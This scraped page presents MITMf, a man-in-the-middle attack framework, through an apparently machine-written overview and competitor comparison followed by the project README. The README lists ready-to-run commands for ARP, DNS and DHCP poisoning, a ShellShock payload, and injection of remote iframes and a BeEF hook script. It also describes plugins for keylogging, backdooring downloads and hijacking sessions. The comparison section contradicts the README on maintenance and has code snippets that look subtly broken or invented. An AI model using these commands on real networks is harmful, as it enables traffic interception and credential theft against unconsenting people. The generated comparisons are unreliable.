Convert Figma logo to code with AI

byt3bl33d3r logoMITMf

Framework for Man-In-The-Middle attacks

3,554
1,054
3,554
135

Top Related Projects

The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here.

16,239

The Swiss Army knife for 802.11, BLE, HID, CAN-bus, IPv4 and IPv6 networks reconnaissance and MITM attacks.

10,773

Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication

Efficient and advanced man in the middle framework

10,989

Incredibly fast crawler designed for OSINT.

Quick Overview

MITMf (Man-In-The-Middle Framework) is a powerful and flexible framework for performing various network attacks and penetration testing. It is designed to intercept, manipulate, and inject network traffic, allowing security professionals to test network security and identify vulnerabilities.

Pros

  • Comprehensive set of features for network manipulation and attacks
  • Modular architecture allowing easy extension and customization
  • Active community and regular updates
  • Supports various protocols and attack vectors

Cons

  • Potential for misuse in malicious activities
  • Requires advanced networking knowledge to use effectively
  • May trigger antivirus or intrusion detection systems
  • Some features may be considered illegal in certain jurisdictions

Getting Started

To get started with MITMf:

  1. Clone the repository:

    git clone https://github.com/byt3bl33d3r/MITMf.git
    
  2. Install dependencies:

    cd MITMf
    pip install -r requirements.txt
    
  3. Run MITMf:

    python mitmf.py -i <interface> --spoof --arp --gateway <gateway_ip> --target <target_ip>
    

Note: Replace <interface>, <gateway_ip>, and <target_ip> with appropriate values for your network setup. Always ensure you have proper authorization before using MITMf on any network.

Competitor Comparisons

The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here.

Pros of Social-Engineer-Toolkit

  • More comprehensive toolkit with a wider range of social engineering attacks
  • Actively maintained with regular updates and contributions
  • Includes a user-friendly command-line interface for easier navigation

Cons of Social-Engineer-Toolkit

  • Larger codebase, potentially more complex to understand and modify
  • May require more system resources due to its extensive feature set
  • Less focused on specific MITM attacks compared to MITMf

Code Comparison

MITMf:

def start_proxy_server():
    from core.proxyplugins import ProxyPlugins
    ProxyPlugins().start_proxy_server()

Social-Engineer-Toolkit:

def menu():
    # Main menu for selecting attack vectors
    print_menu()
    attack_vector = raw_input(setprompt(["1"], ""))
    if attack_vector == "1":
        webattack_menu()

The code snippets show that MITMf focuses on proxy-based attacks, while Social-Engineer-Toolkit provides a broader menu-driven interface for various attack vectors.

16,239

The Swiss Army knife for 802.11, BLE, HID, CAN-bus, IPv4 and IPv6 networks reconnaissance and MITM attacks.

Pros of bettercap

  • More actively maintained with regular updates
  • Broader feature set, including WiFi and Bluetooth capabilities
  • Written in Go, offering better performance and cross-platform support

Cons of bettercap

  • Steeper learning curve due to more complex architecture
  • Requires Go runtime, which may not be pre-installed on all systems

Code Comparison

MITMf (Python):

from core.sslstrip.URLMonitor import URLMonitor
from core.sslstrip.CookieCleaner import CookieCleaner

URLMonitor.getInstance().addRedirection("example.com", "evil.com")
CookieCleaner.getInstance().addHostnameToClean("example.com")

bettercap (Go):

import "github.com/bettercap/bettercap/modules"

mod, _ := modules.NewModule("http.proxy")
mod.Start()
mod.OnEvent(func(e modules.Event) {
    // Handle event
})

Both tools are powerful for network attacks and penetration testing, but bettercap offers a more modern and versatile approach. MITMf, while easier to use for simple tasks, lacks recent updates and may have compatibility issues with newer systems. bettercap's modular design and active development make it more suitable for advanced users and complex scenarios, despite its steeper learning curve.

10,773

Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication

Pros of evilginx2

  • More actively maintained with recent updates
  • Focuses on advanced phishing attacks and credential harvesting
  • Supports multiple target services out-of-the-box

Cons of evilginx2

  • More complex setup and configuration required
  • Limited to phishing attacks, while MITMf offers broader MITM capabilities

Code Comparison

evilginx2 (Go):

func (p *Phishlet) parseTemplate(tmpl string) (*template.Template, error) {
    t := template.New("phishlet")
    t.Funcs(template.FuncMap{
        "base64": func(s string) string {
            return base64.StdEncoding.EncodeToString([]byte(s))
        },
    })
    return t.Parse(tmpl)
}

MITMf (Python):

def start_proxy_server():
    from core.sslstrip.ProxyPlugins import ProxyPlugins
    from core.sergioproxy.ProxyServer import ProxyServer

    print "[*] Proxy server listening on %s:%s" % (self.options.listen_ip, self.options.listen_port)

    self.proxyPlugins = ProxyPlugins(self.options, self.tree)
    self.proxyServer = ProxyServer(self.options, self.tree, self.proxyPlugins)
    self.proxyServer.start()

Both projects serve different purposes within the realm of network attacks. evilginx2 specializes in advanced phishing techniques, while MITMf offers a broader range of man-in-the-middle attack capabilities. The code snippets highlight their different approaches and programming languages used.

Efficient and advanced man in the middle framework

Pros of xerosploit

  • User-friendly interface with a menu-driven system
  • Includes additional tools like DNS spoofing and image replacement
  • Actively maintained with recent updates

Cons of xerosploit

  • Limited customization options compared to MITMf
  • Fewer advanced features for experienced penetration testers
  • Smaller community and less extensive documentation

Code Comparison

MITMf:

from core.sslstrip.DnsCache import DnsCache
from core.sslstrip.URLMonitor import URLMonitor

class SSLstrip(BasePoisoner):
    name = 'SSLstrip'
    optname = 'sslstrip'
    desc = 'Performs HTTPS stripping attacks'

xerosploit:

def get_gateway():
    gateway = check_output("route -n | grep 'UG[ \t]' | awk '{print $2}'", shell=True)
    return gateway.strip()

def get_interfaces():
    interfaces = check_output("netstat -i | awk '{print $1}'", shell=True)
    return interfaces.split()[1:]

The code snippets show that MITMf focuses on SSL stripping functionality, while xerosploit includes network utility functions for identifying gateways and interfaces. MITMf's code suggests a more modular and object-oriented approach, while xerosploit uses simpler procedural functions.

10,989

Incredibly fast crawler designed for OSINT.

Pros of Photon

  • Focused on web reconnaissance and information gathering
  • Lightweight and easy to use
  • Actively maintained with regular updates

Cons of Photon

  • Limited to web-based information gathering
  • Does not provide active attack capabilities
  • May require additional tools for comprehensive penetration testing

Code Comparison

Photon (Python):

def photon(url, level, threads, delay, timeout, cook, headers):
    colors.info('Photon v1.2.8')
    domain = urlparse(url).netloc
    crawled_urls = []
    for url in urls:
        # Crawling and data extraction logic

MITMf (Python):

def start_proxy_server():
    from core.sslstrip.ProxyPlugins import ProxyPlugins
    from core.sergioproxy.ProxyManager import ProxyManager
    ProxyPlugins.getInstance().loadPlugins()
    ProxyManager().setPlugins(ProxyPlugins.getInstance().getPlugins())
    reactor.listenTCP(options.listen_port, ProxyManager())

Summary

Photon is a specialized tool for web reconnaissance, offering a user-friendly approach to information gathering. It's lightweight and regularly updated, but lacks active attack capabilities. MITMf, on the other hand, is a more comprehensive framework for man-in-the-middle attacks, providing a wider range of penetration testing features. The code comparison shows Photon's focus on web crawling and data extraction, while MITMf emphasizes proxy management and plugin integration for various attack scenarios.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

Supported Python versions Latest Version Supported OS Code Climate Build Status Coverage Status

MITMf

Framework for Man-In-The-Middle attacks

This project is no longer being updated. MITMf was written to address the need, at the time, of a modern tool for performing Man-In-The-Middle attacks. Since then many other tools have been created to fill this space, you should probably be using Bettercap as it is far more feature complete and better maintained.

Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io

This tool is based on sergio-proxy and is an attempt to revive and update the project.

Contact me at:

Before submitting issues, please read the relevant section in the wiki .

Installation

Please refer to the wiki for installation instructions

Description

MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.

Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it's been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.

Features

  • The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.

  • As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.

  • The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.

  • MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using Net-Creds, which is run on startup.

  • Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.

Active packet filtering/modification

You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)

For example, here's a stupid little filter that just changes the destination IP address of ICMP packets:

if packet.haslayer(ICMP):
	log.info('Got an ICMP packet!')
	packet.dst = '192.168.1.0'
  • Use the packet variable to access the packet in a Scapy compatible format
  • Use the data variable to access the raw packet data

Now to use the filter all we need to do is: python mitmf.py -F ~/filter.py

You will probably want to combine that with the Spoof plugin to actually intercept packets from someone else ;)

Note: you can modify filters on-the-fly without restarting MITMf!

Examples

The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:

python mitmf.py -i enp3s0

ARP poison the whole subnet with the gateway at 192.168.1.1 using the Spoof plugin:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1

Same as above + a WPAD rogue proxy server using the Responder plugin:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad

ARP poison 192.168.1.16-45 and 192.168.0.1/24 with the gateway at 192.168.1.1:

python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1

Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):

python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1

Enable LLMNR/NBTNS/MDNS spoofing:

python mitmf.py -i enp3s0 --responder --wredir --nbtns

Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):

python mitmf.py -i enp3s0 --spoof --dhcp

Same as above with a ShellShock payload that will be executed if any client is vulnerable:

python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'

Inject an HTML IFrame using the Inject plugin:

python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com

Inject a JS script:

python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js

Start a captive portal that redirects everything to http://SERVER/PATH:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH

Start captive portal at http://your-ip/portal.html using default page /portal.html (thx responder) and /CaptiveClient.exe (not included) from the config/captive folder:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive

Same as above but with hostname captive.portal instead of IP (requires captive.portal to resolve to your IP, e.g. via DNS spoof):

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns

Serve a captive portal with an additional SimpleHTTPServer instance serving the LOCALDIR at http://IP:8080 (change port in mitmf.config):

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR

Same as above but with hostname:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns

And much much more!

Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)

For a complete list of available options, just run python mitmf.py --help

Currently available plugins

  • HTA Drive-By : Injects a fake update notification and prompts clients to download an HTA application
  • SMBTrap : Exploits the 'SMB Trap' vulnerability on connected clients
  • ScreenShotter : Uses HTML5 Canvas to render an accurate screenshot of a clients browser
  • Responder : LLMNR, NBT-NS, WPAD and MDNS poisoner
  • SSLstrip+ : Partially bypass HSTS
  • Spoof : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
  • BeEFAutorun : Autoruns BeEF modules based on a client's OS or browser type
  • AppCachePoison : Performs HTML5 App-Cache poisoning attacks
  • Ferret-NG : Transparently hijacks client sessions
  • BrowserProfiler : Attempts to enumerate all browser plugins of connected clients
  • FilePwn : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
  • Inject : Inject arbitrary content into HTML content
  • BrowserSniper : Performs drive-by attacks on clients with out-of-date browser plugins
  • JSkeylogger : Injects a Javascript keylogger into a client's webpages
  • Replace : Replace arbitrary content in HTML content
  • SMBAuth : Evoke SMB challenge-response authentication attempts
  • Upsidedownternet : Flips images 180 degrees
  • Captive : Creates a captive portal, redirecting HTTP requests using 302

How to fund my tea & sushi reserve

BTC: 1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU

ETH: 0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee

LTC: LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr